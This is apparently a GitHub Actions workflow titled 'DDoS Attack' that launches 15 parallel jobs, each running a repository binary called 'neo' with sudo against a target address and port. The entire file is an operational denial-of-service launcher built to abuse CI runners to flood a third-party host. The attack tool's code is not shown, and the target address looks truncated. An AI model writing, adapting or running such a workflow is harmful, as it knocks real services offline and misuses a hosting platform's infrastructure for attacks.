name: DDoS Attack
on: [push, workflow_dispatch]

jobs:
  attack:
    runs-on: ubuntu-22.04
    strategy:
      matrix:
        count: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15]
    steps:
    - uses: actions/checkout@v3
    - run: chmod +x neo
    - run: sudo ./neo 193.132.23 39482 10 999
